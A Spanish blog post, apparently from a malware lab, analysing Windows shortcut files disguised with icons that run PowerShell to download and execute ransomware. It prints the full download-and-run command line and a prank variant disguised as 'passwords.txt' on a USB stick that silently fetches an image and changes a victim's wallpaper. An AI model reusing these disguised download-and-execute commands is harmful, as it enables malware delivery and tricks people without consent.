Accesos directos como vía de infección de malware

Últimamente hemos estado conviviendo con muchas campañas de propagación de malware por correo que está llenando de SPAM la bandeja de entrada de mucha gente con ficheros maliciosos de todo tipo.

Desde nuestro laboratorio de malware estamos observando que la mayoría de ficheros maliciosos recibidos son bastante poco sutiles. Por ejemplo, ficheros de tipo “Script” con extensiones más raras como “.js”, “.vbs” o “.wsf”, o ficheros ofimáticos de desconocidos, con nombres en otro idioma y que piden que les permitas la ejecución de macros, las cuales el propio Word te bloquea y te recuerda que pueden ser peligrosas (con mucha razón).

No obstante, un caso algo más particular que estamos recibiendo, es el de los accesos directos de Windows con “truco”. No es la primera vez que nos topamos con este método de infección, y a principios de este último mes de 2016 hemos vuelto a recibir ficheros como estos.

La principal ventaja (o desventaja) de los accesos directos de Windows es que se les puede poner cualquier icono, y esto, junto con que Windows trae las extensiones de fichero ocultas por defecto, da la posibilidad de crear ficheros como los siguientes:

Estos accesos directos apuntan al ejecutable “cmd.exe” de Windows y, aprovechando que se le pueden añadir comandos directamente en el propio acceso directo, le pasan los necesarios para descargar y ejecutar el malware final. En este caso un Ransomware bastante peligroso y común los últimos meses.

Volviendo al acceso directo, que es en lo que nos vamos a centrar en este post, si observamos sus propiedades podemos encontrar las distintas partes que componen esta amenaza.

La línea del recuadro marcado con un “1” es la que contiene la lógica para llevar a cabo los malvados planes de este fichero, y se trata de la siguiente:

c:\windows\system32\cmd.exe /c "powershell.exe -executionpolicy bypass import-module bitstransfer;start-bitstransfer -source '*Dirección del fichero malicioso*' -destination '%appdata%.exe';start-process '%appdata%.exe'"

Puede parecer un poco confusa a priori, pero lo que hace es simple y eficaz: llama a “powershell.exe” para poder aprovechar la potencia de algunos de sus módulos, en este caso “bitstransfer” para la descarga del malware y “start-process” para ejecutarlo al terminar la descarga.

Tras ejecutar el acceso directo, debería abrirse durante un segundo una pantalla negra con letras que nos dejaría preocupados, como mínimo, es por ello que, en la zona marcada con un “2”, vemos cómo se le especifica que lo haga minimizado, de forma que sólo parpadearía en la barra de inicio, lo cual resulta mucho más sutil.

Para terminar, como decíamos al principio, este dropper nos ha parecido curioso y hemos estado dándole algunas vueltas para hacer algo menos peligroso y más divertido con esta técnica.

En concreto, hemos pensado en un ejemplo que consistiría en crear en alguna carpeta de un dispositivo USB un “passwords.txt” con la siguiente línea:

C:\windows\system32\cmd.exe /c "powershell.exe ( new-object system.net.webclient).downloadfile('http://i.imgur.com/2mstCYS.jpg', '%temp%\es.jpg'); set-itemproperty -path 'hkcu:\control panel\desktop\' -name wallpaper -value %temp%\es.jpg;notepad.exe"

El resultado de esta línea es que, en el caso de que a algún conocido al que se le preste (con la mejor voluntad) un USB y a este le pueda la curiosidad y quiera ver más de la cuenta, en un primer momento, no verá nada más que un bloc de notas vacío (gracias a la última parte de la línea), pero, tras el reinicio, su sistema cargará del registro un nuevo y sugerente fondo de pantalla bastante conocido por muchos.